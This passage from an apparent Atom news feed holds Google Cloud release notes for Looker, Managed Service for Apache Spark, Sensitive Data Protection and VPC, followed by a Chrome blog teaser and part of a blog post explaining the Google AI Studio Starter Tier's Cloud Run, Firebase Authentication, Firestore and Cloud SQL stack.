&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;The &lt;a href="https://docs.cloud.google.com/looker/docs/finding-content#searching_for_saved_content"&gt;Enhanced search&lt;/a&gt; feature is now generally available.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;The character limit for descriptions on dashboards and Looks has been increased to 2,000 characters, giving content creators the ability to add comprehensive descriptions, operational definitions, and notes to their dashboards and Looks to ensure that viewers fully understand the data context.&lt;/p&gt;
&lt;p&gt;This feature is available to any user with standard content editing rights (&lt;a href="https://docs.cloud.google.com/looker/docs/organizing-spaces#folder_access_levels"&gt;Edit content access level&lt;/a&gt; or &lt;a href="https://docs.cloud.google.com/looker/docs/admin-panel-users-roles#save_dashboards"&gt;&lt;code&gt;save_dashboards&lt;/code&gt;&lt;/a&gt; or &lt;a href="https://docs.cloud.google.com/looker/docs/admin-panel-users-roles#save_looks"&gt;&lt;code&gt;save_looks&lt;/code&gt;&lt;/a&gt; permissions).&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;The &lt;a href="https://docs.cloud.google.com/looker/docs/exploring-self-service"&gt;&lt;strong&gt;Self-service Explores&lt;/strong&gt;&lt;/a&gt; feature has the following updates:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;You can now &lt;a href="https://docs.cloud.google.com/looker/docs/exploring-self-service#bq-table"&gt;upload data from a BigQuery database table to create a self-service Explore&lt;/a&gt;. &lt;/li&gt;
&lt;li&gt;Previously, on the Looker &lt;a href="https://docs.cloud.google.com/looker/docs/admin-panel-self-service-explore"&gt;&lt;strong&gt;Self-service Explores&lt;/strong&gt; Admin page&lt;/a&gt;, there was a single toggle to enable data uploads on the instance. If the &lt;strong&gt;Data Uploads&lt;/strong&gt; toggle was enabled, and your Looker admin also &lt;a href="https://docs.cloud.google.com/looker/docs/admin-panel-self-service-explore#enable-apis"&gt;enabled the APIs to support Google Sheets uploads&lt;/a&gt;, then data imports from Google Sheets were enabled on the instance. Starting in Looker 26.10, there is a separate toggle for &lt;strong&gt;Google Sheets data import&lt;/strong&gt; to allow your Looker admin more granular control over the data uploads on the instance. Your Looker admin can't enable this toggle until after the Looker admin has enabled the the APIs to support Google Sheets uploads.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Looker admins can now programmatically change the owner of dashboards, boards, and agents with the &lt;a href="https://docs.cloud.google.com/looker/docs/reference/looker-api/latest"&gt;Looker API&lt;/a&gt; by updating the associated user ID. This simplifies offboarding and content reassignment when users change roles or leave the organization.&lt;/p&gt;
&lt;p&gt;When the owner of a dashboard, a board, or an agent is changed, new owners are automatically granted &lt;a href="https://docs.cloud.google.com/looker/docs/organizing-spaces#folder_access_levels"&gt;Manage/Edit access&lt;/a&gt; to transferred agents. Any existing &lt;a href="https://docs.cloud.google.com/looker/docs/content-certification"&gt;certification badges&lt;/a&gt; on transferred dashboards remain intact.&lt;/p&gt;
&lt;p&gt;The API initiator must have &lt;a href="https://docs.cloud.google.com/looker/docs/admin-panel-users-roles#save_content"&gt;&lt;code&gt;save_content&lt;/code&gt;&lt;/a&gt; and &lt;a href="https://docs.cloud.google.com/looker/docs/admin-panel-users-roles#manage_spaces"&gt;&lt;code&gt;manage_spaces&lt;/code&gt;&lt;/a&gt; access to the folder where the asset resides.&lt;/p&gt;
&lt;p&gt;Transferring ownership of dashboards and boards doesn't automatically grant the new owner access to parent folders, models, or underlying Looks.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Now available in preview, the &lt;a href="https://docs.cloud.google.com/looker/docs/filters-user-defined-dashboards#filters_as_tiles"&gt;Filters as tiles and tile-level filter context&lt;/a&gt; feature lets you convert dashboard filters into draggable tiles on the dashboard canvas. A dashboard editor can then drag and arrange filter tiles on the dashboard canvas in the same way as other dashboard tiles. To enable this feature, a Looker admin must turn on the &lt;strong&gt;Filters as tiles and tile-level filter context&lt;/strong&gt; setting on the &lt;strong&gt;Previews&lt;/strong&gt; admin page.&lt;/p&gt;
&lt;p&gt;In addition, viewers can now check which filters are applied to a specific visualization tile.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Now available in preview, the &lt;a href="https://docs.cloud.google.com/looker/docs/google-map-options"&gt;Google Maps&lt;/a&gt; enhancements feature adds the following features:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Fully supported &lt;a href="https://docs.cloud.google.com/looker/docs/google-map-options#3d_heatmap"&gt;vector maps&lt;/a&gt; for rendering thousands of data points seamlessly that support tilt, rotation, and dynamic 3D extrusions to elevate visual storytelling at every zoom level.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/looker/docs/google-map-options#dual-axis_map"&gt;Dual-axis metric comparison&lt;/a&gt; that lets you analyze multiple business metrics simultaneously on a single map interface, using heatmaps and points to uncover spatial correlations without switching views.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/looker/docs/google-map-options#layers_menu_options"&gt;Contextual and custom overlays&lt;/a&gt; that enhance geographical analysis by layering live traffic, transit, or bicycle routes, with granular styling controls for tailored iconography, colors, and sizing.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;The &lt;a href="custom-looker-visualization-gemini"&gt;Visualization Assistant&lt;/a&gt; is now available in the &lt;a href="https://docs.cloud.google.com/looker/docs/editing-visualizations-new-explore-experience#using_the_visualization_assistant_in_the_new_explore_experience"&gt;new Explore experience&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;The &lt;a href="https://docs.cloud.google.com/looker/docs/gemini-expression-asst"&gt;Gemini Expression Assistant&lt;/a&gt; preview feature has been updated to increase performance.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Now available in preview, the &lt;a href="https://docs.cloud.google.com/looker/docs/admin-panel-general-preview-features#kpi_visualization"&gt;&lt;strong&gt;KPI Visualization&lt;/strong&gt; feature&lt;/a&gt; replaces the &lt;strong&gt;Single Value&lt;/strong&gt; chart option with the &lt;strong&gt;KPI (Single Value)&lt;/strong&gt; chart option. The new KPI (Single Value) chart option lets users access the following enhanced styling options for single value visualizations:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Adding secondary visualizations: Users can add a sparkline or bar chart within a visualization to show trends or distributions that are related to the primary KPI.&lt;/li&gt;
&lt;li&gt;Showing enhanced comparisons: Users can specify and compare a primary value against any other measure in an Explore query, using data from the first row, second row, last row, or totals row.&lt;/li&gt;
&lt;li&gt;Accessing improved styling options: Users have more control over the appearance of the visualization, including the background color of the tile and the alignment of the values.
This feature is disabled by default. &lt;a href="https://docs.cloud.google.com/looker/docs/kpi-single-value-options"&gt;Learn more about the new KPI (Single Value) Visualization&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;Looker dashboard agents are now included in the embedded Looker experience. Embed users with the &lt;a href="https://docs.cloud.google.com/looker/docs/signed-embedding#permissions"&gt;appropriate permissions&lt;/a&gt; can see dashboard agents on all the embedded dashboards that they have access to.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/looker/docs/embedding"&gt;Learn more about how to configure an embedded dashboard for embed user visibility&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;Conversational Analytics data agents that are &lt;a href="https://docs.cloud.google.com/looker/docs/conversational-analytics-looker-data-agents#publish-data-agents"&gt;published to Gemini Enterprise&lt;/a&gt; now support visualizations in their conversations.&lt;/p&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;The &lt;a href="https://docs.cloud.google.com/looker/docs/admin-panel-general-preview-features#granular-dashboard-sizing"&gt;Granular Dashboard Sizing preview feature&lt;/a&gt; is now enabled by default.&lt;/p&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;The dashboard summary feature can now be enabled separately from dashboard data agents. This feature is disabled by default. When this feature is enabled, a &lt;a href="https://docs.cloud.google.com/looker/docs/conversational-analytics-looker-data-agents-dashboards#dashboard-summaries"&gt;dashboard summary&lt;/a&gt; is generated automatically at the top of the dashboard data agent conversation. To enable this feature, a Looker admin must turn on the &lt;strong&gt;Enable Dashboard Summary&lt;/strong&gt; feature on the &lt;strong&gt;Gemini in Looker&lt;/strong&gt; admin page.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Now available in preview, enhanced observability metrics, including engagement and token usage data, are available for Conversational Analytics on the &lt;a href="https://docs.cloud.google.com/looker/docs/system-activity-dashboards#conversational-analytics"&gt;Conversational Analytics System Activity dashboard&lt;/a&gt;. To enable this feature, a Looker admin must turn on the &lt;strong&gt;Conversational Analytics Observability&lt;/strong&gt; setting on the &lt;strong&gt;Previews&lt;/strong&gt; admin page.&lt;/p&gt;
&lt;h3&gt;Breaking&lt;/h3&gt;
&lt;p&gt;When you update the Gemini Enterprise instance that is connected to Looker, any &lt;a href="https://docs.cloud.google.com/looker/docs/conversational-analytics-looker-data-agents#publish-data-agents"&gt;data agents that you published&lt;/a&gt; to the previous Gemini Enterprise instance will be unpublished. You can still access these data agents in Looker, but you must re-publish them to the new Gemini Enterprise instance before you can chat with those agents in Gemini Enterprise.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Managed Service for Apache Spark&lt;/h2&gt;
&lt;h3&gt;Breaking&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Managed Service for Apache Spark&lt;/strong&gt; (formerly Dataproc on Compute Engine):
The new subminor image versions (&lt;code&gt;1.3.96&lt;/code&gt;, &lt;code&gt;1.4.81&lt;/code&gt;, &lt;code&gt;1.5.92&lt;/code&gt;, &lt;code&gt;2.0.161&lt;/code&gt;, &lt;code&gt;2.1.116&lt;/code&gt;, &lt;code&gt;2.2.84&lt;/code&gt;, &lt;code&gt;2.3.32&lt;/code&gt;) do not have preconfigured Conda channels and are not mapped to default aliases (such as &lt;code&gt;2.3-debian12&lt;/code&gt;, &lt;code&gt;2.3-ubuntu22&lt;/code&gt;, etc.) until August 25, 2026.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Impact:&lt;/strong&gt; When creating clusters with these image versions, specify the exact subminor version (for example, &lt;code&gt;2.3.32-debian12&lt;/code&gt;). Packages cannot be installed using Conda unless channels are manually configured during cluster initialization.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Mitigation:&lt;/strong&gt; If your workloads require preconfigured Conda channels or default aliases, pin your clusters to the previous image versions.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Default change schedule:&lt;/strong&gt; The subminor versions &lt;code&gt;1.3.96&lt;/code&gt;, &lt;code&gt;1.4.81&lt;/code&gt;, &lt;code&gt;1.5.92&lt;/code&gt;, and &lt;code&gt;2.0.161&lt;/code&gt; will become default after August 25, 2026. Additionally, newer subminor versions for &lt;code&gt;2.1&lt;/code&gt;, &lt;code&gt;2.2&lt;/code&gt;, and &lt;code&gt;2.3&lt;/code&gt; released after August 25, 2026 will not have preconfigured Conda channels and will be mapped to default aliases. All workloads must use new images after August 25, 2026, since prior subminor versions with conda channels preconfigured will be disallowed from usage.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;New &lt;a href="https://docs.cloud.google.com/managed-spark/docs/concepts/versioning/image-version-lists#supported-dataproc-image-versions"&gt;&lt;strong&gt;Managed Service for Apache Spark&lt;/strong&gt; (formerly Dataproc on Compute Engine) subminor cluster image versions&lt;/a&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;1.3.96-debian10, 1.3.96-ubuntu18&lt;/li&gt;
&lt;li&gt;1.4.81-debian10, 1.4.81-ubuntu18&lt;/li&gt;
&lt;li&gt;1.5.92-debian10, 1.5.92-rocky8, 1.5.92-ubuntu18&lt;/li&gt;
&lt;li&gt;2.0.161-debian10, 2.0.161-rocky8, 2.0.161-ubuntu18&lt;/li&gt;
&lt;li&gt;2.1.115-debian11, 2.1.115-rocky8, 2.1.115-ubuntu20, 2.1.115-ubuntu20-arm&lt;/li&gt;
&lt;li&gt;2.1.116-debian11, 2.1.116-rocky8, 2.1.116-ubuntu20, 2.1.116-ubuntu20-arm&lt;/li&gt;
&lt;li&gt;2.2.83-debian12, 2.2.83-rocky9, 2.2.83-ubuntu22, 2.2.83-ubuntu22-arm&lt;/li&gt;
&lt;li&gt;2.2.84-debian12, 2.2.84-rocky9, 2.2.84-ubuntu22, 2.2.84-ubuntu22-arm&lt;/li&gt;
&lt;li&gt;2.3.31-debian12, 2.3.31-ml-ubuntu22, 2.3.31-rocky9, 2.3.31-ubuntu22, 2.3.31-ubuntu22-arm&lt;/li&gt;
&lt;li&gt;2.3.32-debian12, 2.3.32-ml-ubuntu22, 2.3.32-rocky9, 2.3.32-ubuntu22, 2.3.32-ubuntu22-arm&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Managed Service for Apache Spark&lt;/strong&gt; (formerly Dataproc on Compute Engine):
Key updates in these image versions include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Iceberg support&lt;/strong&gt;: Added support for Iceberg 1.10 in Dataproc 2.3 images. This change only applies to 2.3 clusters created with the &lt;code&gt;ICEBERG&lt;/code&gt; optional component. Users can opt-in to Iceberg 1.10 by setting the &lt;code&gt;dataproc:dataproc.iceberg.version&lt;/code&gt; cluster property to &lt;code&gt;1.10&lt;/code&gt; during cluster creation.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Spark optimizations&lt;/strong&gt;: Enabled Spark skewed-join and self-join optimizations by default in new GCE image versions.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scheduler exitTimeout&lt;/strong&gt;: Configured &lt;code&gt;spark.scheduler.listenerbus.exitTimeout&lt;/code&gt; to 30s for Compute Engine deployments.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 class="release-note-product-title"&gt;Sensitive Data Protection&lt;/h2&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;Image scanning is available in the following cloud regions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;asia-southeast1&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;us-east4&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;us-west1&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For more information, see &lt;a href="https://cloud.google.com/sensitive-data-protection/docs/locations#image-limitations"&gt;Locations that support image scanning&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Between July 2025 and June 2026, some &lt;a href="https://docs.cloud.google.com/sensitive-data-protection/docs/metrics-reference#table-data-profile"&gt;table data
profiles&lt;/a&gt; saved to BigQuery contained an incorrect
&lt;code&gt;1970-01-01&lt;/code&gt; timestamp instead of &lt;code&gt;NULL&lt;/code&gt; in &lt;a href="https://docs.cloud.google.com/sensitive-data-protection/docs/reference/rest/v2/organizations.locations.tableDataProfiles#TableDataProfile.FIELDS.expiration_time"&gt;&lt;code&gt;expiration_time&lt;/code&gt;&lt;/a&gt;
for tables that don't expire. This issue has been fixed. New exports of table
data profiles show the correct expiration timestamps.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Virtual Private Cloud&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Preview&lt;/strong&gt;: RoCE VPC networks for VM instances support assigning alias IP
ranges to &lt;code&gt;MRDMA&lt;/code&gt; vNICs. For more information about these features, see the
following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/vpc/docs/rdma-network-profiles"&gt;RDMA network profiles&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/vpc/docs/alias-ip"&gt;Alias IP ranges&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#June_22_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-06-22T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://developer.chrome.com/blog/agent-ready-toolkit?hl=en</id>
    <title>A developer toolkit to make your website agent-ready</title>
    <updated>2026-06-22T07:00:00+00:00</updated>
    <content type="html">Learn how to build agent-ready websites using the Lighthouse Agentic browsing category and Chrome DevTools for agents.</content>
    <link href="https://developer.chrome.com/blog/agent-ready-toolkit?hl=en" rel="alternate"/>
    <category term="Chrome for Developers"/>
    <published>2026-06-22T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/developers-practitioners/the-starter-tier-for-google-ai-studio-explained/</id>
    <title>The Starter Tier for Google AI Studio explained</title>
    <updated>2026-06-22T07:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You've got a working prototype in &lt;/span&gt;&lt;a href="https://ai.google.dev/aistudio" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google AI Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. A React frontend, a Node.js backend, maybe a database. Now you want a live URL to share with your team, your users, or a friend who wants to try it.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Google Cloud gives you a full platform for deploying production applications, with fine-grained IAM controls, billing management, and region selection. That's exactly what you want when you're building something serious. But when you just need to get a prototype online in the next ten minutes, there's now a faster path.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;a href="https://docs.cloud.google.com/docs/starter-tier" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Starter Tier&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; resources like &lt;/span&gt;&lt;a href="https://cloud.google.com/run" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Run&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://firebase.google.com/products/firestore" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Firestore&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/sql/docs/postgres" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud SQL for PostgreSQL&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;a href="https://firebase.google.com/products/auth" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Firebase Authentication&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; are provisioned in a fully-managed project. You can get started with using them without a payment method (like a credit card) or a billing account. Your Google Account is enough to go from prompt to live URL, with a database and auth all baked in.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;What the Starter Tier actually is&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When you set up any of the Starter Tier services within Google AI Studio, Google provisions a fully managed project behind the scenes. You don't create it, configure it, or administer it. Google handles the region selection, API enablement, and security policies for you.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Who can use it? The Starter Tier is currently available to individual Google Accounts. If you are signed in with a corporate or educational &lt;/span&gt;&lt;a href="https://workspace.google.com" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Workspace&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; account, organization-level administrative policies may restrict your ability to deploy resources. It is also bound by the regional availability of Google AI Studio.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;This is different from a standard Google Cloud project where you'd manage IAM roles, enable APIs, and link a billing account. The Starter Tier project is minimalist by design. You can't enable &lt;/span&gt;&lt;a href="https://cloud.google.com/bigquery" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BigQuery&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; or &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/pubsub/docs/overview" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Pub/Sub&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; in it. You can't change the region of any resources. And that's the point: fewer knobs means fewer ways to go off track.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;The console experience matches this philosophy. Instead of the full Google Cloud console with hundreds of product pages, Starter Tier users get a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/docs/starter-tier#manage-resources" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;simplified view&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; focused on what matters for a prototype: application logs, performance metrics, and basic container configuration. If you navigate to an unsupported product, you'll be prompted to start a separate &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/free/docs/free-cloud-features#free-trial" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Free Trial&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; instead of accidentally provisioning billable resources.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;One thing to know: Starter Tier resources aren't governed by the standard Google Cloud Terms of Service. They fall under the &lt;/span&gt;&lt;a href="https://cloud.google.com/terms/starter-tier-additional-terms-of-service" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Starter Tier Additional Terms&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. For prototyping and business applications, these terms won't get in your way.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;What you get: the pre-wired stack&lt;/h3&gt;
&lt;p&gt;The Starter Tier doesn't give you the entire Google Cloud catalog. Instead, it offers a pre-wired stack of four products that are provisioned on demand as your application's architecture requires them.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="architecture" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/architecture_mPMBXDV.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;Cloud Run&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/run" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Run&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is the compute layer. Every Google AI Studio deployment creates a Cloud Run service that handles HTTP traffic. Under the Starter Tier, you can deploy up to two active web applications at a time per Google Account. Cloud Run services scale automatically based on incoming traffic and scale down to zero when idle, meaning your prototypes don't consume resources when not in use. They run in a single region that is locked in when you first provision your Starter Tier environment.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Firebase Authentication&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;If your app needs user login, the Starter Tier includes &lt;/span&gt;&lt;a href="https://firebase.google.com/products/auth" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Firebase Authentication&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; with &lt;/span&gt;&lt;a href="https://developers.google.com/identity/sign-in/web/sign-in" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Sign-In&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; preconfigured. The AI agent in Google AI Studio can detect when your prompt implies user identity (for example, "build a shared to-do list") and will offer to enable auth automatically.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;If your application builds on &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/databases/vibe-coded-ai-studio-apps-with-firestore-firebase-cloud-sql" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Workspace integrations&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, this sign-in flow simplifies credentials. Once a user logs in, your application can request OAuth access scopes to securely interact with their Gmail, Docs, Calendar, or Sheets data, making it straightforward to prototype internal tools like summarizers or inbox sorters.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Firestore&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;a href="https://firebase.google.com/products/firestore" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Firestore&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is a database service that handles NoSQL data storage. The Google AI Studio agent can provision it automatically when your prompt implies the need for structured data storage. The AI agent generates the client-side sync code (typically a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/src/lib/firebase.ts&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; file), and drafts application-appropriate &lt;/span&gt;&lt;a href="https://firebase.google.com/docs/firestore/enterprise/security/get-started" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Firebase Security Rules&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (for example, utilizing &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;request.auth.uid&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; to restrict document access to the authenticated creator).&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;If you hit a "Missing or insufficient permissions" error, you can click "Fix error" in Google AI Studio, and the agent will rewrite the security rules to match your updated app logic. It's worth reviewing these security rules manually before sharing your app broadly, though. AI-generated security rules are a starting point, not a guarantee.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;All Firestore databases created by the Google AI Studio agent share a usage quota (more on that in the limits section below).&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud SQL for PostgreSQL Developer edition&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
